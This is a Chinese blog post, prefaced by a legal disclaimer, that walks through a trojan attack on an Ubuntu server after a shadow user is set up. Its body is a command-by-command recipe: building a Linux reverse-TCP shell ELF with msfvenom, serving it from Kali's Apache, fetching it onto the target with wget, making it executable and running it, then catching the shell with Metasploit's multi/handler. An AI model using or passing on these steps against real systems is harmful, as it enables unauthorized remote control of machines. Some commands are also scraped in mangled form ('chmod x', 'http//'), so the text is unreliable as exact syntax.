在目标ubuntu服务器设置影子用户后的木马攻击

发布时间:2026/7/15 8:49:53

在目标ubuntu服务器设置影子用户后的木马攻击 本博客所载网络安全知识、技术教程、漏洞分析、防护方案、工具介绍等内容仅用于合法学习、研究与技术交流严禁用于未经授权的渗透测试、入侵、破坏、数据窃取或任何违反国家法律法规、公序良俗的行为。内容仅供参考所有内容为个人经验与公开信息整理不构成专业安全服务、法律意见或操作指令博主不保证内容绝对准确、完整、及时与适用。合法使用义务使用者必须严格遵守《中华人民共和国网络安全法》《数据安全法》《个人信息保护法》及所在地区相关规定仅在获得书面授权的合法场景下使用相关技术。风险自担因使用、参考本博客内容所导致的任何直接 / 间接损失、法律责任、安全事件均由使用者自行承担博主与运营方不承担任何责任。第三方链接博客可能包含外部链接第三方网站内容与安全性不由博主控制访问与使用风险自负。版权与合规转载内容会注明来源如涉及侵权请联系核实删除。修改权博主保留随时更新本声明及博客内容的权利继续使用视为接受最新版本。首先在kali处开启msfmsfconsole然后msfvenom -p linux/64/shell/reverse_tcp LHOSTkaliIP LPORT9999 -f elf -o shell.elfkaliIP用ip a查询即可LPORT处位攻击机的监听端口尽量选不常用的否则可能会造成端口占用的冲突 -f elf为设置木马类型-o为生成shell.elf为木马名称。生成木马后需将木马移动到/var/www/html处mv 木马名 /var/www/html。移动完成后需要打开kali的apache服务service apache2 start让攻击机暂时成为一个网站服务器。然后切换至ubuntu通过浏览器搜索URLkaliIP/木马名或在终端处输入指令wget http//kaliIP/木马名 -o 木马名下载木马并修改木马权限chmod x 木马名再启动木马./shell.elf)最后切换至kali启动监听模块use exploit/multi/handler设置载荷set payload linux/64/shell/reverse_tcp),设置监听IPset lhost kaliIP)设置监听端口set lport kali端口此处IP和端口号同上。最后run即可。

相关新闻